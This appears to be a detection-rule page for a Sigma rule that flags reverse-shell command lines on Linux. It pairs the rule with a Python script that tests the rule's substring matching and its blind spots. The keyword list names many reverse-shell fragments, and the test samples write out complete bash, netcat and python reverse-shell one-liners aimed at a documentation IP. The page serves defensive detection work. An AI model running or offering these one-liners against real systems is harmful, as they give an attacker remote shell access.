Suspicious Reverse Shell Command Line
Detects suspicious shell commands or program code that may be executed, or passed on a command line, to establish a reverse shell.
Sigma rule

```yaml
title: Suspicious Reverse Shell Command Line
id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab
status: test
description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
references:
  - https://alamot.github.io/reverse_shells/
author: Florian Roth (Nextron Systems)
date: 2019-04-02
modified: 2021-11-27
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  product: linux
detection:
  keywords:
    - 'BEGIN {s = "/inet/tcp/0/'
    - 'bash -i >& /dev/tcp/'
    - 'bash -i >& /dev/udp/'
    - 'sh -i >$ /dev/udp/'
    - 'sh -i >$ /dev/tcp/'
    - '&& while read line 0<&5; do'
    - '/bin/bash -c exec 5<>/dev/tcp/'
    - '/bin/bash -c exec 5<>/dev/udp/'
    - 'nc -e /bin/sh '
    - '/bin/sh | nc'
    - 'rm -f backpipe; mknod /tmp/backpipe p && nc '
    - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
    - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    - '/bin/sh -i <&3 >&3 2>&3'
    - 'uname -a; w; id; /bin/bash -i'
    - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
    - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'
    - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
    - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'
    - 'rm -f /tmp/p; mknod /tmp/p p &&'
    - ' | /bin/bash | telnet '
    - ',echo=0,raw tcp-listen:'
    - 'nc -lvvp '
    - 'xterm -display 1'
  condition: keywords
falsepositives:
  - Unknown
level: high
```
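The rule has no field selection: its `keywords` list is an OR of substring matches that the Sigma backend applies, case-insensitively, to the whole log message (typically the process command line on Linux). The following is an added example, not code from SigmaHQ or the rule author, that re-implements that matching in plain Python and runs it over constructed command lines (the IP is documentation space, not captured telemetry). It shows the three caveats a practitioner should know before deploying the rule: matching is literal, so `nc 192.0.2.10 4444 -e /bin/sh` (arguments reordered) does not hit `nc -e /bin/sh `; the two `sh -i` patterns are published with `>$`, so a plain `sh -i >& /dev/tcp/...` command line matches nothing in this list; and listener-side strings such as `nc -lvvp ` are in the list, so local listeners on an admin host fire at level `high` as well.

```python
from __future__ import annotations

# Keyword list copied from the rule above, with YAML single-quote escaping
# ('' -> ') resolved. Sigma treats these as case-insensitive substrings,
# and a bare keyword list is an OR of them (condition: keywords).
REVERSE_SHELL_KEYWORDS = [
    'BEGIN {s = "/inet/tcp/0/',
    'bash -i >& /dev/tcp/',
    'bash -i >& /dev/udp/',
    'sh -i >$ /dev/udp/',
    'sh -i >$ /dev/tcp/',
    '&& while read line 0<&5; do',
    '/bin/bash -c exec 5<>/dev/tcp/',
    '/bin/bash -c exec 5<>/dev/udp/',
    'nc -e /bin/sh ',
    '/bin/sh | nc',
    'rm -f backpipe; mknod /tmp/backpipe p && nc ',
    ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))',
    ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;',
    '/bin/sh -i <&3 >&3 2>&3',
    'uname -a; w; id; /bin/bash -i',
    '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};',
    ";os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');",
    '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)',
    ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print',
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:",
    'rm -f /tmp/p; mknod /tmp/p p &&',
    ' | /bin/bash | telnet ',
    ',echo=0,raw tcp-listen:',
    'nc -lvvp ',
    'xterm -display 1',
]


def matching_keywords(command_line: str) -> list[str]:
    """Return every rule keyword contained in command_line (case-insensitive)."""
    haystack = command_line.lower()
    return [kw for kw in REVERSE_SHELL_KEYWORDS if kw.lower() in haystack]


def is_suspicious(command_line: str) -> bool:
    """True when the rule would fire on this command line."""
    return bool(matching_keywords(command_line))


def scan(samples: dict[str, str]) -> dict[str, list[str]]:
    """Run the rule over a batch of {label: command_line} and report matches per label."""
    return {label: matching_keywords(cmd) for label, cmd in samples.items()}


# Constructed sample command lines (assumed, not real telemetry).
SAMPLES = {
    # classic bash /dev/tcp reverse shell -> matches
    "bash_tcp": "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    # netcat with -e in the order the rule expects -> matches
    "nc_e": "nc -e /bin/sh 192.0.2.10 4444",
    # same netcat shell, arguments reordered -> no match (literal substring)
    "nc_reordered": "nc 192.0.2.10 4444 -e /bin/sh",
    # python one-liner containing the dup2/HISTFILE fragment -> matches
    "python": "python -c \"import socket,os,pty;s=socket.socket();s.connect(('192.0.2.10',4444));"
              "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
              "os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/sh')\"",
    # sh with >& : the rule's sh patterns are written with >$ -> no match
    "sh_amp": "sh -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    # a local listener: listener-side string is in the list -> matches
    "listener": "nc -lvvp 4444",
    # benign admin activity -> no match
    "benign": "grep -r reverse_shell /var/log",
}

if __name__ == "__main__":
    for label, hits in scan(SAMPLES).items():
        print(f"{label:12s} {'ALERT' if hits else 'ok   '} {hits}")
```

Because the rule matches the raw message, the same logic applies to any Linux source your backend feeds it (auditd `EXECVE` records, Sysmon for Linux process creation, shell history shipped by an agent); the misses above are the point: extend the list, or add a field-based selection, rather than relying on these literals alone.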
References
- https://alamot.github.io/reverse_shells/
Related rules
- AWS EC2 Startup Shell Script Change
- BPFtrace Unsafe Option Usage
- Equation Group Indicators
- Interactive Bash Suspicious Children
- JexBoss Command Sequence